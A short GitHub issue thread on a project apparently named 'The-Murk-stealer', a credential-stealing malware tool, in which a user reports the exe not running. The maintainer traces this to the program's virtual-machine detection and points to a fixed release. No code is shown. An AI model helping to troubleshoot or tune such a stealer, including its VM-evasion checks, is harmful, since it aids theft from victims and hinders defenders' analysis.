### ISSUE TITLE
no thing happend

### ISSUE THREAD

**Issue by newproject23** [Nick-Vinesmoke/The-Murk-stealer#95]
noting happend  when i open the exe and i try to run the py code and no thing happening

**Comment by Nick-Vinesmoke** [comment]
Hi, show me the console output

**Comment by Hoangdepzaivcl** [comment]
![image](https://github.com/Nick-Vinesmoke/The-Murk-stealer/assets/124053344/80b9494c-f7bf-4ba7-ad26-e9a15eb7027b)

**Comment by Nick-Vinesmoke** [comment]
It stops working after checking for a virtual machine, this means that you open it on a VM

**Comment by Nick-Vinesmoke** [comment]
fixed, try the new [release](https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v9.2.0)
